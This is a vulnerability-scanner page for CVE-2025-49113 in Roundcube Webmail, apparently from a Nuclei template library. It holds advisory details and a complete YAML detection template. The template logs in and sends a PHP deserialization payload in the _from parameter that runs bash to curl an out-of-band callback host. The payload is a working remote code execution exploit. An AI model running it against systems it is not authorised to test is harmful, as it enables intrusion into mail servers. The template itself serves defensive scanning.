Roundcube Webmail - Remote Code Execution
CVE-2025-49113
Verified
Description
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Severity
Critical
CVSS Score
9.9
Exploit Probability
1%
Published Date
June 5, 2025
Template Author
rootxharsh, iamnoooob, pdresearch
+1
CVE-2025-49113.yaml
id: CVE-2025-49113 info: name: Roundcube Webmail - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch,Ademking severity: critical description: | Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-49113 - https://fearsoff.org/research/roundcube - https://github.com/advisories/GHSA-8j8w-wwqc-x596 - http://www.openwall.com/lists/oss-security/2025/06/02/3 - https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10 - https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d - https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695 - https://github.com/roundcube/roundcubemail/commit/c50a07d88ca38f018a0f4a0b008e9a1deb32637e classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2025-49113 cwe-id: CWE-502 epss-score: 0.00661 epss-percentile: 0.70056 metadata: verified: true max-request: 3 shodan-query: http.component:"roundcube" fofa-query: "roundcube_sessid" tags: cve,cve2025,roundcube,rce,deserialization,intrusive flow: | if (http(1)) { http(2) && http(3) && http(4) } variables: username: "{{username}}" password: "{{password}}" filename: "{{randbase(9)}}" oast: "{{interactsh-url}}" oast_new: "{{replace(oast,'.','\\\\x2e')}}" http: - method: GET path: - '{{BaseURL}}' extractors: - type: regex name: major group: 1 regex: - '"rcversion":(\d)' internal: true - type: regex name: minor group: 1 regex: - '"rcversion":\d\d(\d)' internal: true - type: regex name: patch group: 1 regex: - '"rcversion":\d\d\d(\d+)' internal: true - type: dsl name: version dsl: - major + "." + minor + "." + patch internal: true - type: dsl dsl: - '"Roundcube Version: "+ version' matchers: - type: dsl name: version_check dsl: - compare_versions(version, '< 1.5.10') || (compare_versions(version,'>= 1.6.0') && compare_versions(version, '< 1.6.11')) - contains_any(body, "roundcube", "Roundcube") - contains(body, "rcversion") condition: and - raw: - | GET / HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body name: nonce group: 1 regex: - '"request_token":"(.*?)"' internal: true - raw: - | POST /?_task=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _token={{nonce}}&_task=login&_action=login&_timezone=Asia%2FDubai&_url=&_user={{username}}&_pass={{password}} matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(location, "task=mail")' condition: and internal: true - raw: - | POST /?_task=settings&_framed=1&_remote=1&_from=!";O:16:"Crypt_GPG_Engine":1:{s:8:"_gpgconf";s:{{44 + len(oast_new)}}:"bash+-c+"printf+'curl+{{oast_new}}'>/tmp/p;bash+/tmp/p";";}}&_action=upload HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxc4v9AJAwaNTZhjk ------WebKitFormBoundaryxc4v9AJAwaNTZhjk Content-Disposition: form-data; name="_file[]"; filename="firstfile|a:1:{s:57:\"a\";}" Content-Type: image/png {{base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')}} ------WebKitFormBoundaryxc4v9AJAwaNTZhjk-- matchers: - type: dsl name: exploit_check dsl: - 'status_code == 200' - 'contains(interactsh_protocol, "dns")' - 'contains_all(body, "add2attachment_list", "rcmfile", "mimetype", "firstfile")' condition: and # digest: 4a0a00473045022077953b1c77f62f080875d813215a5d731f54cc87fd0d6f02c6b193f41d526929022100affb171083e1fb65b94dd9eaa1d75d88a9db4288fb7e345e2d3d018c5ede082e:922c64590222798bb761d5b6d8e72950
9.9Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-49113
CWE ID:
cwe-502
References
https://nvd.nist.gov/vuln/detail/CVE-2025-49113https://fearsoff.org/research/roundcubehttps://github.com/advisories/GHSA-8j8w-wwqc-x596http://www.openwall.com/lists/oss-security/2025/06/02/3https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4dhttps://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695https://github.com/roundcube/roundcubemail/commit/c50a07d88ca38f018a0f4a0b008e9a1deb32637e